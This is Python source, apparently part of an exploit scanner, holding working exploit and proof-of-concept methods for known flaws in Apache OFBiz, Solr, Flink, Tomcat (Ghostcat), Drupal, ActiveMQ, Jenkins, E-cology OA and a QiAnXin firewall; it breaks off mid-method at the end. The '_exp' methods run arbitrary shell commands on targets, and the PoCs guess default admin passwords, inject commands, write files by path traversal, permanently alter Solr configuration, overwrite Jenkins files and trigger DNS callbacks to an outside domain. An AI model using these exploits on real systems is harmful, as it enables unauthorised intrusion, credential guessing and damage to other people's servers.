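def cve_2021_30128_exp(self, cmd):
    """Blind RCE exploit for Apache OFBiz CVE-2021-30128 via /webtools/control/SOAPService.

    `cmd` is hex-encoded (two lowercase digits per byte) and spliced into the
    class-level `payload_cve_2021_30128_exp` template in place of `RECOMMAND`,
    then POSTed as XML.  The target returns no command output, so an HTTP 200
    only means the request was accepted; the result line says so ("No Echo").
    Output goes through `verify.exploit_print`; nothing is returned.

    Args:
        cmd: shell command to execute on the target (blind, no output).
    """
    vul_name = "Apache OFBiz: CVE-2021-30128"
    headers = {
        'User-Agent': self.ua,
        'Content-Type': 'text/xml',
        'Connection': 'close',
    }
    # bytes.hex() yields exactly what the old ''.join('%.2x' % b) loop did.
    cmd_hex = bytes(cmd, encoding="utf8").hex()
    data = self.payload_cve_2021_30128_exp.replace("RECOMMAND", cmd_hex)
    url = urljoin(self.url, "/webtools/control/SOAPService")
    try:
        # verify=False is deliberate: scanner targets commonly use self-signed certs.
        request = requests.post(url, data=data, headers=headers,
                                timeout=self.timeout, verify=False)
        # Bug fix: the original printed `self.raw_data` without ever assigning
        # it in this method, so the "raw" dump shown was stale data from a
        # previous exploit (or an AttributeError).  Capture this exchange.
        self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
        if request.status_code == 200:
            r = "Command Executed Successfully (But No Echo)"
        else:
            r = "Command Executed Failed... ..."
        verify.exploit_print(r, self.raw_data)
    except requests.exceptions.Timeout:
        verify.timeout_print(vul_name)
    except requests.exceptions.ConnectionError:
        verify.connection_print(vul_name)
    except Exception:
        verify.error_print(vul_name)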
def time_2021_0515_exp(self, cmd):
    """Exploit the E-cology OA WorkflowServiceXml RCE (tracked as time-2021-0515).

    The class-level `payload_time_2021_0515` body is POSTed to
    `/services%20/WorkflowServiceXml`; the command itself travels in a `cmd`
    request header.  The response body is printed as command output through
    `verify.exploit_print`.  Nothing is returned.

    Args:
        cmd: shell command to execute on the target.
    """
    vul_name = "E-cology OA WorkflowServiceXml RCE: time-2021-0515"
    target = urljoin(self.url, "/services%20/WorkflowServiceXml")
    request_headers = {
        'User-Agent': self.ua,
        'SOAPAction': '""',
        'cmd': cmd,
        "Content-Type": "text/xml;charset=UTF-8",
    }
    try:
        response = requests.post(target,
                                 data=self.payload_time_2021_0515,
                                 headers=request_headers,
                                 timeout=self.timeout,
                                 verify=False)
        self.raw_data = dump.dump_all(response).decode('utf-8', 'ignore')
        verify.exploit_print(response.text, self.raw_data)
    except requests.exceptions.Timeout:
        verify.timeout_print(vul_name)
    except requests.exceptions.ConnectionError:
        verify.connection_print(vul_name)
    except Exception:
        verify.error_print(vul_name)
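def cve_2019_17558_exp(self, cmd):
    """Exploit Apache Solr CVE-2019-17558 (VelocityResponseWriter template RCE).

    Steps: list cores through `/solr/admin/cores`, enable the Velocity
    response writer with `params.resource.loader.enabled=true` via the core's
    `/config` API, then request the class-level `payload_cve_2019_17558`
    template with `RECOMMAND` replaced by `cmd` and print the response body.
    Output goes through `verify.exploit_print`; nothing is returned.

    NOTE(review): the `/config` POST is a persistent change to the target's
    core configuration — the Velocity writer stays enabled after this runs.

    Args:
        cmd: shell command to execute on the target.
    """
    vul_name = "Apache Solr: CVE-2019-17558"
    payload_2 = self.payload_cve_2019_17558.replace("RECOMMAND", cmd)
    url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
    try:
        request = requests.get(url_core, headers=self.headers,
                               timeout=self.timeout, verify=False)
        # Bug fix: the original caught only AttributeError here, but a
        # non-JSON body raises ValueError, a missing "status" key KeyError and
        # an empty core list IndexError — none of which were handled, and the
        # code then went on to build a "/solr/None/..." URL.
        try:
            core_name = list(json.loads(request.text)["status"])[0]
        except (ValueError, KeyError, IndexError, TypeError):
            core_name = None
        if core_name is None:
            verify.error_print(vul_name)
            return
        url_api = self.url + "/solr/" + str(core_name) + "/config"
        headers_json = {'Content-Type': 'application/json', 'User-Agent': self.ua}
        set_api_data = """
        {
          "update-queryresponsewriter": {
            "startup": "lazy",
            "name": "velocity",
            "class": "solr.VelocityResponseWriter",
            "template.base.dir": "",
            "solr.resource.loader.enabled": "true",
            "params.resource.loader.enabled": "true"
          }
        }
        """
        requests.post(url_api, data=set_api_data, headers=headers_json,
                      timeout=self.timeout, verify=False)
        request = requests.get(self.url + "/solr/" + str(core_name) + payload_2,
                               headers=self.headers, timeout=self.timeout,
                               verify=False)
        raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
        verify.exploit_print(request.text, raw_data)
    except requests.exceptions.Timeout:
        verify.timeout_print(vul_name)
    except requests.exceptions.ConnectionError:
        verify.connection_print(vul_name)
    except Exception:
        verify.error_print(vul_name)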
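def cve_2018_7602_poc(self):
    """PoC for Drupal CVE-2018-7602 (drupalgeddon2 bypass, authenticated RCE).

    The vulnerable path is the account-cancel form, which needs a logged-in
    user, so this PoC first tries the hard-coded credentials admin/admin
    (a credential-guessing step against the target).  It then injects
    `#post_render => passthru` through the `destination` query string, lets
    the server cache the poisoned form and fires it via the `file/ajax`
    callback; a random marker echoed back proves execution.  If that fails it
    falls back to a weak version check of `/CHANGELOG.txt` ("PoC_MaYbE").
    Results go through `verify.scan_print`; nothing is returned.

    Side effects on the target: a login attempt as `admin` and, on success,
    `echo <marker>` run by the web server user.
    """
    self.threadLock.acquire()
    try:
        self.vul_info["prt_name"] = "Drupal: CVE-2018-7602"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info["vul_name"] = "Drupal drupalgeddon2 remote code execution"
        self.vul_info["vul_numb"] = "CVE-2018-7602"
        self.vul_info["vul_apps"] = "Drupal"
        self.vul_info["vul_date"] = "2018-06-19"
        self.vul_info["vul_vers"] = "< 7.59, < 8.5.3"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "远程代码执行"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "这个漏洞是CVE-2018-7600的绕过利用,两个漏洞原理是一样的。" \
                                    "攻击者可以通过不同方式利用该漏洞远程执行代码。" \
                                    "CVE-2018-7602这个漏洞是CVE-2018-7600的另一个利用点,只是入口方式不一样。"
        self.vul_info["cre_date"] = "2021-01-29"
        self.vul_info["cre_auth"] = "zhzyker"
        DRUPAL_U = "admin"
        DRUPAL_P = "admin"
        md = random_md5()
        cmd = "echo " + md
        # Render-array injection carried in the `destination` query string.
        inject = ('/cancel?q[%23post_render][]=passthru&q[%23type]=markup'
                  '&q[%23markup]=' + cmd)
        try:
            self.session = requests.Session()
            # Step 1: log in — the cancel form is only reachable authenticated.
            self.get_params = {'q': 'user/login'}
            self.post_params = {
                'form_id': 'user_login',
                'name': DRUPAL_U,
                'pass': DRUPAL_P,
                'op': 'Log in',
            }
            self.session.post(self.url, params=self.get_params,
                              data=self.post_params, headers=self.headers,
                              timeout=self.timeout, verify=False)
            # Step 2: read our own user id from the profile page's foaf meta tag.
            self.get_params = {'q': 'user'}
            self.r = self.session.get(self.url, params=self.get_params,
                                      headers=self.headers,
                                      timeout=self.timeout, verify=False)
            self.soup = BeautifulSoup(self.r.text, "html.parser")
            self.user_id = self.soup.find('meta', {'property': 'foaf:name'}).get('about')
            if "?q=" in self.user_id:
                self.user_id = self.user_id.split("=")[1]
            # Step 3: fetch the cancel form to obtain its form_token.
            self.get_params = {'q': self.user_id + '/cancel'}
            self.r = self.session.get(self.url, params=self.get_params,
                                      headers=self.headers,
                                      timeout=self.timeout, verify=False)
            self.soup = BeautifulSoup(self.r.text, "html.parser")
            self.form = self.soup.find('form', {'id': 'user-cancel-confirm-form'})
            self.form_token = self.form.find('input', {'name': 'form_token'}).get('value')
            # Step 4: submit with the poisoned `destination`; the server caches
            # the form and hands back a form_build_id for it.
            self.get_params = {
                'q': self.user_id + '/cancel',
                'destination': self.user_id + inject,
            }
            self.post_params = {
                'form_id': 'user_cancel_confirm_form',
                'form_token': self.form_token,
                '_triggering_element_name': 'form_id',
                'op': 'Cancel account',
            }
            self.r = self.session.post(self.url, params=self.get_params,
                                       data=self.post_params,
                                       headers=self.headers,
                                       timeout=self.timeout, verify=False)
            self.soup = BeautifulSoup(self.r.text, "html.parser")
            self.form = self.soup.find('form', {'id': 'user-cancel-confirm-form'})
            self.form_build_id = self.form.find('input', {'name': 'form_build_id'}).get('value')
            # Step 5: trigger the cached render array through the file/ajax callback.
            self.get_params = {
                'q': 'file/ajax/actions/cancel/#options/path/' + self.form_build_id
            }
            self.post_params = {'form_build_id': self.form_build_id}
            self.r = self.session.post(self.url, params=self.get_params,
                                       data=self.post_params,
                                       headers=self.headers,
                                       timeout=self.timeout, verify=False)
            if md in misinformation(self.r.text, md):
                self.vul_info["vul_data"] = dump.dump_all(self.r).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["vul_payd"] = inject
                self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
            else:
                # Fallback: version fingerprint from CHANGELOG.txt.  Bug fix:
                # the original sent `data=self.payload` on this GET — an
                # attribute this method never sets — which could abort the
                # fallback with an AttributeError that the catch-all swallowed.
                self.request = requests.get(self.url + "/CHANGELOG.txt",
                                            headers=self.headers,
                                            timeout=self.timeout, verify=False)
                self.rawdata = dump.dump_all(self.request).decode('utf-8', 'ignore')
                self.allver = re.findall(r"([\d][.][\d]?[.]?[\d])", self.request.text)
                if self.request.status_code == 200 and r"Drupal" in self.request.text:
                    # NOTE(review): "patched version string absent from the
                    # changelog" is a weak heuristic; treat "maybe" as such.
                    if '7.59' not in self.allver and '8.5.3' not in self.allver:
                        # Bug fix: the evidence for this verdict is the CHANGELOG
                        # response (`self.rawdata`, previously computed and
                        # discarded), not the failed exploit response `self.r`.
                        self.vul_info["vul_data"] = self.rawdata
                        self.vul_info["prt_resu"] = "PoC_MaYbE"
                        self.vul_info["vul_payd"] = inject
                        self.vul_info["prt_info"] = "[maybe] [rce] [cmd:" + cmd + "]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])
    finally:
        # Always release, even if a print helper raises — a leaked lock would
        # stall every other PoC thread.
        self.threadLock.release()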
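def cve_2015_5254_poc(self):
    """PoC for Apache ActiveMQ CVE-2015-5254 (JMS ObjectMessage deserialization).

    Detection is version-based only — no deserialization payload is sent.
    The PoC tries a short list of default admin credentials against `/admin`
    (a credential-guessing step against the target), scrapes the version
    from the console page and reports "PoC_MaYbE" when it is older than
    5.13.0.  Results go through `verify.scan_print`; nothing is returned.
    """

    def _version_tuple(text):
        # "5.11.1" -> (5, 11, 1); text without digits yields ().
        return tuple(int(p) for p in re.findall(r"\d+", text))

    self.threadLock.acquire()
    try:
        self.vul_info["prt_name"] = "Apache AcitveMQ: CVE-2015-5254"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        # Bug fix: this field said "Apache Flink" (copy/paste from the Flink
        # PoC); the entry describes the ActiveMQ deserialization issue.
        self.vul_info["vul_name"] = "Apache ActiveMQ 反序列化漏洞"
        self.vul_info["vul_numb"] = "CVE-2015-5254"
        self.vul_info["vul_apps"] = "AcitveMQ"
        self.vul_info["vul_date"] = "2015-07-01"
        self.vul_info["vul_vers"] = "< 5.13.0"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "反序列化漏洞"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的" \
                                    "Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。"
        self.vul_info["cre_date"] = "2021-01-07"
        self.vul_info["cre_auth"] = "zhzyker"
        self.passlist = [
            "admin:123456", "admin:admin", "admin:123123",
            "admin:activemq", "admin:12345678",
        ]
        self.ver = 5555
        self.get_ver = None
        try:
            try:
                for pa in self.passlist:
                    token = base64.b64encode(str.encode(pa)).decode('utf-8')
                    headers_base64 = {
                        'User-Agent': self.ua,
                        'Authorization': 'Basic ' + token,
                    }
                    self.request = requests.get(self.url + "/admin",
                                                headers=headers_base64,
                                                timeout=self.timeout,
                                                verify=False)
                    self.rawdata = dump.dump_all(self.request).decode('utf-8', 'ignore')
                    if self.request.status_code == 200:
                        self.vul_info["vul_payd"] = pa
                        # Assumes the second bold table cell of the console
                        # page holds the version string — TODO confirm.
                        self.get_ver = re.findall("<td><b>(.*)</b></td>", self.request.text)[1]
                        self.ver = self.get_ver.replace(".", "")
                        break
            except IndexError:
                # Console page without the expected cell: version unknown.
                pass
            # Bug fix: the original compared int("5.x.y" minus dots) < 5130,
            # which mis-orders multi-digit components (e.g. "6.0.0" -> 600 is
            # flagged as older than 5.13.0).  Compare component-wise instead.
            version = _version_tuple(self.get_ver) if self.get_ver else ()
            if version and version < (5, 13, 0):
                self.vul_info["vul_data"] = dump.dump_all(self.request).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoC_MaYbE"
                self.vul_info["prt_info"] = "[maybe] [version: " + self.get_ver + "] [version check]"
                verify.scan_print(self.vul_info)
            else:
                verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])
    finally:
        self.threadLock.release()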
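def time_2021_0410_poc(self):
    """PoC for the QiAnXin NS-NGFW (Netkang) firewall unauthenticated RCE.

    Calls the `SSLVPN_Resource.deleteImage` RPC on `/directdata/direct/router`
    with an image path of the form `/var/www/html/d.txt;echo <marker> >
    /var/www/html/<marker>.txt`, assuming the path reaches a shell unescaped.
    The marker file is then fetched over HTTP; success requires a 200, the
    marker in the body and the file name itself *not* echoed (to rule out a
    reflected request).  Results go through `verify.scan_print`; nothing is
    returned.

    Side effect on the target: leaves `/var/www/html/<marker>.txt` behind.
    NOTE(review): `vul_numb` reads "time-2021-0415" while the method name,
    prt_name and vul_date say 0410 — one of them is likely a typo; left as-is.
    """
    self.threadLock.acquire()
    try:
        self.vul_info["prt_name"] = "QiAnXin NS-NGFW: time-2021-0410"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info["vul_name"] = "Qianxin NS-NGFW Netkang Next Generation Firewall Front RCE"
        self.vul_info["vul_numb"] = "time-2021-0415"
        self.vul_info["vul_apps"] = "QiAnXin"
        self.vul_info["vul_date"] = "2021-04-10"
        self.vul_info["vul_vers"] = "unknow"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "RCE"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "Qianxin NS-NGFW Netkang Next Generation Firewall Front RCE"
        self.vul_info["cre_date"] = "2021-04-16"
        self.vul_info["cre_auth"] = "zhzyker"
        url = urljoin(self.url, "/directdata/direct/router")
        md = random_md5()
        cmd = "echo " + md
        data = {
            "action": "SSLVPN_Resource",
            "method": "deleteImage",
            "data": [{
                "data": [
                    "/var/www/html/d.txt;" + cmd + " > /var/www/html/" + md + ".txt"
                ]
            }],
            "type": "rpc",
            "tid": 17,
        }
        data = json.dumps(data)
        try:
            request = requests.post(url, data=data, headers=self.headers,
                                    timeout=self.timeout, verify=False)
            # The marker is written to the web root, so it is fetched relative
            # to self.url (urljoin drops any trailing path segment of self.url).
            url = urljoin(self.url, md + ".txt")
            req = requests.get(url, data="1", headers=self.headers,
                               timeout=self.timeout, verify=False)
            if (md in misinformation(req.text, md)
                    and (md + ".txt") not in req.text
                    and req.status_code == 200):
                self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["vul_payd"] = data
                self.vul_info["prt_info"] = "[rce:" + url + " ]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])
    finally:
        # Release unconditionally so a failing print helper cannot leak the
        # lock and stall the other PoC threads.
        self.threadLock.release()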
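def cve_2020_17518_poc(self):  # 2020-01-07
    """PoC for Apache Flink CVE-2020-17518 (path traversal in /jars/upload).

    POSTs a hand-built multipart body whose `filename` climbs to
    `/tmp/<random>`.  Detection is indirect: GET `/jars/upload` answering 404
    together with the POST answering 400 and mentioning
    `RestHandlerException` is reported as "PoC_MaYbE".  Nothing is checked on
    disk; the target may end up with `/tmp/<random>` written.
    Results go through `verify.scan_print`; nothing is returned.

    NOTE(review): the multipart body uses bare `\\n` line endings, not the
    `\\r\\n` multipart requires; since the check keys on a 400 response the
    framing is intentionally left as-is.
    """
    self.threadLock.acquire()
    try:
        self.name = random_md5()
        self.vul_info["prt_name"] = "Apache Flink: CVE-2020-17518"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = 'Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/' + self.name
        self.vul_info["vul_name"] = "Apache Flink 任意文件写入漏洞"
        self.vul_info["vul_numb"] = "CVE-2020-17518"
        self.vul_info["vul_apps"] = "Flink"
        self.vul_info["vul_date"] = "2021-01-05"
        self.vul_info["vul_vers"] = "< 1.11.3 or < 1.12.0"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "任意文件写入"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "Apache Flink 1.11.0中引入了一项更新,该更新在1.11.1及更高的版本和1.11.2中发布。" \
                                    "Apache Flink 控制面板的Submit New Job处存在任意文件上传:"
        self.vul_info["cre_date"] = "2021-01-07"
        self.vul_info["cre_auth"] = "zhzyker"
        self.info = "null"
        self.method = "post"
        self.r = "PoCWating"
        # Bug fix: the original assigned this multipart header set to
        # `self.headers`, clobbering the instance-wide default headers that
        # every other PoC on this object sends afterwards.  Keep it local.
        headers = {
            'User-Agent': self.ua,
            'Connection': 'close',
            'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y',
        }
        body = '\n------WebKitFormBoundaryoZ8meKnrrso89R6Y'
        body += '\nContent-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/' + self.name
        body += '\n\nsuccess'
        body += '\n------WebKitFormBoundaryoZ8meKnrrso89R6Y--'
        try:
            self.r404 = requests.get(self.url + "/jars/upload", headers=headers,
                                     timeout=self.timeout, verify=False)
            self.request = requests.post(self.url + "/jars/upload", data=body,
                                         headers=headers, timeout=self.timeout,
                                         verify=False)
            self.rawdata = dump.dump_all(self.request).decode('utf-8', 'ignore')
            if self.r404.status_code == 404 and self.request.status_code == 400:
                if r"org.apache.flink.runtime.rest.handler.RestHandlerException:" in self.request.text:
                    self.vul_info["vul_data"] = self.rawdata
                    self.vul_info["prt_resu"] = "PoC_MaYbE"
                    self.vul_info["prt_info"] = "[maybe] [upload: /tmp/" + self.name + "]"
                    verify.scan_print(self.vul_info)
                else:
                    verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])
    finally:
        self.threadLock.release()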
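def cve_2020_1938_poc(self):
    """PoC for Apache Tomcat CVE-2020-1938 ("Ghostcat", AJP arbitrary file read).

    Opens a raw TCP socket to `self.port`, sends an AJP13 forward request with
    `javax.servlet.include.*` attributes pointing at `WEB-INF/web.xml`, and
    treats a body containing the stock web.xml text ("Welcome to Tomcat" plus
    the ASF licence line) as proof.  No HTTP exchange takes place, so
    `vul_data` is a fixed explanatory note.  Results go through
    `verify.scan_print`; nothing is returned.

    NOTE(review): AJP normally listens on 8009, not the HTTP port; `self.port`
    is used unchanged here, so the caller must already point it at AJP.
    """
    self.threadLock.acquire()
    sock = None
    try:
        self.vul_info["prt_name"] = "Apache Tomcat: CVE-2020-1938"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "WEB-INF/web.xml"
        self.vul_info["vul_name"] = "Tomcat ajp13 协议任意文件读取"
        self.vul_info["vul_numb"] = "CVE-2020-1938"
        self.vul_info["vul_apps"] = "Tomcat"
        self.vul_info["vul_date"] = "2020-02-20"
        self.vul_info["vul_vers"] = "< 7.0.100, < 8.5.51, < 9.0.31"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "任意文件读取 "
        # Bug fix: the note named "cve-2020-2019"; this is CVE-2020-1938.
        self.vul_info["vul_data"] = ">_< Tomcat cve-2020-1938 vulnerability uses AJP protocol detection\n" \
                                    ">_< So there is no HTTP protocol request and response"
        self.vul_info["vul_desc"] = "该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数," \
                                    "读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。"
        self.vul_info["cre_date"] = "2021-01-21"
        self.vul_info["cre_auth"] = "zhzyker"
        headers = self.headers
        self.output_method = "ajp"
        self.default_port = self.port
        self.default_requri = '/'
        self.default_headers = {}
        self.username = None
        self.password = None
        self.getipport = urlparse(self.url)
        self.hostname = self.getipport.hostname
        self.request = "null"
        self.default_file = "WEB-INF/web.xml"
        try:
            socket.setdefaulttimeout(self.timeout)
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.socket = sock
            self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            self.socket.connect((self.hostname, self.default_port))
            self.stream = self.socket.makefile("rb", buffering=0)  # PY2: bufsize=0
            # Include attributes make Tomcat serve the named file from the
            # webapp root instead of routing the request URI.
            self.attributes = [
                {'name': 'req_attribute',
                 'value': ['javax.servlet.include.request_uri', '/']},
                {'name': 'req_attribute',
                 'value': ['javax.servlet.include.path_info', self.default_file]},
                {'name': 'req_attribute',
                 'value': ['javax.servlet.include.servlet_path', '/']},
            ]
            method = 'GET'
            self.forward_request = ApacheTomcat.__prepare_ajp_forward_request(
                self, self.hostname, self.default_requri,
                method=AjpForwardRequest.REQUEST_METHODS.get(method))
            if self.username is not None and self.password is not None:
                # Bug fix: the original used the Python 2 str.encode('base64')
                # codec and a one-argument .replace("\n" ""), both of which
                # raise on Python 3.  Dead today (both fields are None).
                cred = ("%s:%s" % (self.username, self.password)).encode()
                self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = \
                    "Basic " + base64.b64encode(cred).decode()
            for h in self.default_headers:
                self.forward_request.request_headers[h] = headers[h]
            for a in self.attributes:
                self.forward_request.attributes.append(a)
            self.responses = self.forward_request.send_and_receive(self.socket, self.stream)
            if len(self.responses) == 0:
                # Bug fix: the original `return None, None` here skipped
                # threadLock.release(), deadlocking every later PoC thread.
                return
            self.snd_hdrs_res = self.responses[0]
            self.data_res = self.responses[1:-1]
            self.request = b"".join([d.data for d in self.data_res]).decode()
            if r"Welcome to Tomcat" in self.request and r"You may obtain a copy of the License at" in self.request:
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["prt_info"] = "[ajp13] [port:" + str(self.default_port) + " file:" + self.default_file + "]"
            verify.scan_print(self.vul_info)
        except socket.timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])
    finally:
        # Bug fix: the socket was never closed.
        if sock is not None:
            sock.close()
        self.threadLock.release()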
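def cve_2019_17558_poc(self):
    """PoC for Apache Solr CVE-2019-17558 (VelocityResponseWriter template RCE).

    Lists cores through `/solr/admin/cores`, enables the Velocity response
    writer with parameter-supplied templates via the core's `/config` API,
    then requests the class-level template with `ping <marker>.<ceye domain>`
    as the command.  A hit is confirmed out-of-band by polling the ceye API
    for the marker; if no callback arrives but the `/config` update returned
    200 the target is reported as "PoC_MaYbE".  Results go through
    `verify.scan_print`; nothing is returned.

    Side effects on the target: the Velocity writer stays enabled in the core
    config after the scan (persistent change) and a ping / DNS lookup to the
    callback domain is triggered.
    """
    self.threadLock.acquire()
    try:
        self.vul_info["prt_name"] = "Apache Solr: CVE-2019-17558"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = self.payload_cve_2019_17558.replace("RECOMMAND", "whoami")
        self.vul_info["vul_name"] = "Apache Solr Velocity template Remote Code Execution"
        # Bug fix: the identifier read "CVE-2018-17558" (wrong year) while
        # prt_name and the method itself say 2019.
        self.vul_info["vul_numb"] = "CVE-2019-17558"
        self.vul_info["vul_apps"] = "Solr"
        self.vul_info["vul_date"] = "2017-10-16"
        self.vul_info["vul_vers"] = "5.0.0 - 8.3.1"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "Remote Code Execution"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "用户可以注入自定义模板,通过Velocity模板语言执行任意命令。"
        self.vul_info["cre_auth"] = "zhzyker"
        core_name = None
        md = random_md5()
        cmd = "ping " + md + "." + self.ceye_domain
        payload_2 = self.payload_cve_2019_17558.replace("RECOMMAND", cmd)
        url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
        try:
            request = requests.get(url_core, headers=self.headers,
                                   timeout=self.timeout, verify=False)
            try:
                core_name = list(json.loads(request.text)["status"])[0]
            except (ValueError, KeyError, IndexError, TypeError):
                # No parsable core list; the flow continues so that a result
                # line is still printed (the "maybe" branch needs a core).
                core_name = None
            url_api = self.url + "/solr/" + str(core_name) + "/config"
            headers_json = {
                'Content-Type': 'application/json',
                'User-Agent': self.ua,
            }
            set_api_data = """
            {
              "update-queryresponsewriter": {
                "startup": "lazy",
                "name": "velocity",
                "class": "solr.VelocityResponseWriter",
                "template.base.dir": "",
                "solr.resource.loader.enabled": "true",
                "params.resource.loader.enabled": "true"
              }
            }
            """
            r = requests.post(url_api, data=set_api_data, headers=headers_json,
                              timeout=self.timeout, verify=False)
            req = requests.get(self.url + "/solr/" + str(core_name) + payload_2,
                               headers=self.headers, timeout=self.timeout,
                               verify=False)
            # Bug fix: the callback poll had no timeout, so a stalled ceye API
            # hung the scanner thread while it held threadLock.  TLS
            # verification stays on for this third-party service.
            request = requests.get(self.ceye_api + self.ceye_token, timeout=self.timeout)
            if md in request.text:
                self.vul_info["vul_data"] = dump.dump_all(req).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["prt_info"] = "[corename: " + self.url + "/solr/" + str(core_name) + " ]"
                verify.scan_print(self.vul_info)
            elif r.status_code == 200 and core_name is not None:
                self.vul_info["vul_data"] = dump.dump_all(req).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoC_MaYbE"
                self.vul_info["prt_info"] = "[maybe] [corename: " + self.url + "/solr/" + core_name + " ]"
                verify.scan_print(self.vul_info)
            else:
                verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])
    finally:
        self.threadLock.release()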
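def cve_2018_1000861_poc(self):
    """PoC for Jenkins CVE-2018-1000861 (Stapler routing code execution).

    Uses the class-level `payload_cve_2018_1000861` URL template with a
    base64-encoded, URL-quoted command in `RECOMMAND`.  First attempt writes
    `echo <marker>` into `$JENKINS_HOME/war/robots.txt` and reads it back via
    `/robots.txt`; if the marker is absent a DNS-callback variant
    (`ping <marker>.<ceye domain>`) is sent and the ceye API is polled.
    Results go through `verify.scan_print`; nothing is returned.

    Side effects on the target: `$JENKINS_HOME/war/robots.txt` (served as
    /robots.txt) is OVERWRITTEN, and an outbound DNS/ICMP probe is triggered.
    """
    self.threadLock.acquire()
    try:
        self.vul_info["prt_name"] = "Jenkins: CVE-2018-1000861"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = self.payload_cve_2018_1000861.replace("RECOMMAND", "whoami")
        self.vul_info["vul_name"] = "Jenkins 远程代码执行漏洞"
        self.vul_info["vul_numb"] = "CVE-2018-1000861"
        self.vul_info["vul_apps"] = "Jenkins"
        self.vul_info["vul_date"] = "2018-01-29"
        self.vul_info["vul_vers"] = "<= 2.153, LTS <= 2.138.3"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "远程代码执行漏洞"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "Jenkins 2.153和更早版本,LTS 2.138.3和更早版本使用的Stapler Web框架中的订书机" \
                                    "/core/src/main/java/org/kohsuke/stapler/MetaClass.java中存在一个代码执行漏洞," \
                                    "攻击者可以使用该方法调用某些方法通过访问不希望以这种方式调用的特制URL来访问Java对象。"
        self.vul_info["cre_date"] = "2021-01-21"
        self.vul_info["cre_auth"] = "zhzyker"
        md = random_md5()
        cmd = "echo " + md

        def _encode(shell_cmd):
            # The template expects base64(cmd), URL-quoted for the query string.
            return urllib.parse.quote(base64.b64encode(str.encode(shell_cmd)).decode('ascii'))

        self.c_echo = "echo \":-)\" > $JENKINS_HOME/war/robots.txt;" + cmd + " >> $JENKINS_HOME/war/robots.txt"
        self.c_base = base64.b64encode(str.encode(self.c_echo))
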